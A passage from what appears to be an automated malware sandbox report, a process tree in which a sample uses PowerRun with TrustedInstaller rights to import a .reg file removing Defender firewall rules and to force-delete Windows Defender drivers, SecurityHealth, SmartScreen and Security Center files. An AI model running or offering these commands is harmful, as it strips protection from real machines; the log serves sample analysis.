      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ regedit.exe /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveWindowsDefenderFirewallRules.reg"
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4400
        
        C:\Windows\regedit.exe
        
        "C:\Windows\regedit.exe" /s "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\Remove_SecurityComp\RemoveWindowsDefenderFirewallRules.reg"
        7⤵
        Modifies firewall policy service
        Runs .reg file with regedit
        
        PID:2740
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance_Error.png""
      4⤵
      PID:456
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance_Error.png""
        5⤵
        
        PID:1796
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance_Error.png""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityAndMaintenance_Error.png""
        7⤵
        
        PID:3268
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance.png""
      4⤵
      PID:3996
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance.png""
        5⤵
        
        PID:1300
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityAndMaintenance.png""
        6⤵
        
        PID:936
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityAndMaintenance.png""
        7⤵
        
        PID:4880
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSystray.exe""
      4⤵
      PID:4952
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSystray.exe""
        5⤵
        
        PID:2064
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSystray.exe""
        6⤵
        
        PID:2140
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthSystray.exe""
        7⤵
        
        PID:3860
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthService.exe""
      4⤵
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthService.exe""
        5⤵
        
        PID:2072
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthService.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3336
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthService.exe""
        7⤵
        
        PID:3260
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthHost.exe""
      4⤵
      PID:2268
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthHost.exe""
        5⤵
        
        PID:4552
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthHost.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3868
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthHost.exe""
        7⤵
        
        PID:1796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3472
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\drivers\SgrmAgent.sys""
      4⤵
      PID:3228
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\drivers\SgrmAgent.sys""
        5⤵
        
        PID:1192
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\drivers\SgrmAgent.sys""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1316
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\drivers\SgrmAgent.sys""
        7⤵
        
        PID:2080
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\drivers\WdDevFlt.sys""
      4⤵
      PID:3608
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\drivers\WdDevFlt.sys""
        5⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\drivers\WdDevFlt.sys""
        6⤵
        
        PID:1760
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\drivers\WdDevFlt.sys""
        7⤵
        
        PID:2520
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\drivers\WdBoot.sys""
      4⤵
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\drivers\WdBoot.sys""
        5⤵
        
        PID:4396
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\drivers\WdBoot.sys""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\drivers\WdBoot.sys""
        7⤵
        
        PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\drivers\WdFilter.sys""
      4⤵
      PID:1160
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\drivers\WdFilter.sys""
        5⤵
        
        PID:3540
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\drivers\WdFilter.sys""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4816
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\drivers\WdFilter.sys""
        7⤵
        
        PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
      4⤵
      PID:1540
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
        5⤵
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
        6⤵
        
        PID:1788
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscsvc.dll""
        7⤵
        
        PID:4900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3468
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\drivers\WdNisDrv.sys""
      4⤵
      PID:1492
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\drivers\WdNisDrv.sys""
        5⤵
        
        PID:2512
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\drivers\WdNisDrv.sys""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\drivers\WdNisDrv.sys""
        7⤵
        
        PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
      4⤵
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
        5⤵
        
        PID:1536
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscsvc.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscsvc.dll""
        7⤵
        
        PID:5068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1340
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscproxystub.dll""
      4⤵
      PID:2764
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscproxystub.dll""
        5⤵
        
        PID:4356
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscproxystub.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:2680
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscproxystub.dll""
        7⤵
        
        PID:664
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscisvif.dll""
      4⤵
      PID:4624
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscisvif.dll""
        5⤵
        
        PID:4664
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscisvif.dll""
        6⤵
        
        PID:4964
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscisvif.dll""
        7⤵
        
        PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthProxyStub.dll""
      4⤵
      PID:4336
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthProxyStub.dll""
        5⤵
        
        PID:4708
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthProxyStub.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthProxyStub.dll""
        7⤵
        
        PID:744
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\smartscreen.dll""
      4⤵
      PID:1560
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\smartscreen.dll""
        5⤵
        
        PID:4960
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\smartscreen.dll""
        6⤵
        
        PID:720
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\smartscreen.dll""
        7⤵
        
        PID:2468
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.dll""
      4⤵
      PID:1232
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.dll""
        5⤵
        
        PID:1596
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.dll""
        6⤵
        
        PID:5076
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\smartscreen.dll""
        7⤵
        
        PID:4604
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\smartscreen.exe""
      4⤵
      PID:4572
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\smartscreen.exe""
        5⤵
        
        PID:1900
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\smartscreen.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3972
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\smartscreen.exe""
        7⤵
        
        PID:3608
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.exe""
      4⤵
      PID:3556
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.exe""
        5⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreen.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:3508
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\smartscreen.exe""
        7⤵
        
        PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\DWWIN.EXE""
      4⤵
      PID:1220
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\DWWIN.EXE""
        5⤵
        
        PID:3100
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\DWWIN.EXE""
        6⤵
        
        PID:2176
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\DWWIN.EXE""
        7⤵
        
        PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreenps.dll""
      4⤵
      PID:4672
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreenps.dll""
        5⤵
        
        PID:3604
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\smartscreenps.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:2492
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\smartscreenps.dll""
        7⤵
        
        PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\smartscreenps.dll""
      4⤵
      PID:316
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\smartscreenps.dll""
        5⤵
        
        PID:2152
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\smartscreenps.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5064
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\smartscreenps.dll""
        7⤵
        
        PID:2992
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthCore.dll""
      4⤵
      PID:3428
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthCore.dll""
        5⤵
        
        PID:640
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthCore.dll""
        6⤵
        
        PID:3672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthCore.dll""
        7⤵
        
        PID:1528
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:2140
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSsoUdk.dll""
      4⤵
      PID:3108
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSsoUdk.dll""
        5⤵
        
        PID:4396
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthSsoUdk.dll""
        6⤵
        
        PID:220
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthSsoUdk.dll""
        7⤵
        
        PID:4596
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthUdk.dll""
      4⤵
      PID:4672
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthUdk.dll""
        5⤵
        
        PID:3916
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthUdk.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4576
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthUdk.dll""
        7⤵
        
        PID:2748
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthAgent.dll""
      4⤵
      PID:3076
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthAgent.dll""
        5⤵
        
        PID:4888
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\SecurityHealthAgent.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1716
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\SecurityHealthAgent.dll""
        7⤵
        
        PID:724
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscapi.dll""
      4⤵
      PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscapi.dll""
        5⤵
        
        PID:512
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscapi.dll""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:4468
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscapi.dll""
        7⤵
        
        PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\wscadminui.exe""
      4⤵
      PID:1052
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\wscadminui.exe""
        5⤵
        
        PID:3324
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\wscadminui.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5116
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\wscadminui.exe""
        7⤵
        
        PID:2268
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\SysWOW64\GameBarPresenceWriter.exe""
      4⤵
      PID:4152
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\SysWOW64\GameBarPresenceWriter.exe""
        5⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\SysWOW64\GameBarPresenceWriter.exe""
        6⤵
        Modifies data under HKEY_USERS
        
        PID:1768
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\SysWOW64\GameBarPresenceWriter.exe""
        7⤵
        
        PID:4804
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
      PowerRun cmd.exe /c del /f ""C:\Windows\System32\GameBarPresenceWriter.exe""
      4⤵
      PID:4624
    - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" cmd.exe /c del /f ""C:\Windows\System32\GameBarPresenceWriter.exe""
        5⤵
        
        PID:3068
      - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe" /TI/ cmd.exe /c del /f ""C:\Windows\System32\GameBarPresenceWriter.exe""
        6⤵
        
        PID:3360
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del /f ""C:\Windows\System32\GameBarPresenceWriter.exe""
        7⤵
        
        PID:1540
  - - C:\Users\Admin\AppData\Local\Temp\7zS5708.tmp\PowerRun.exe
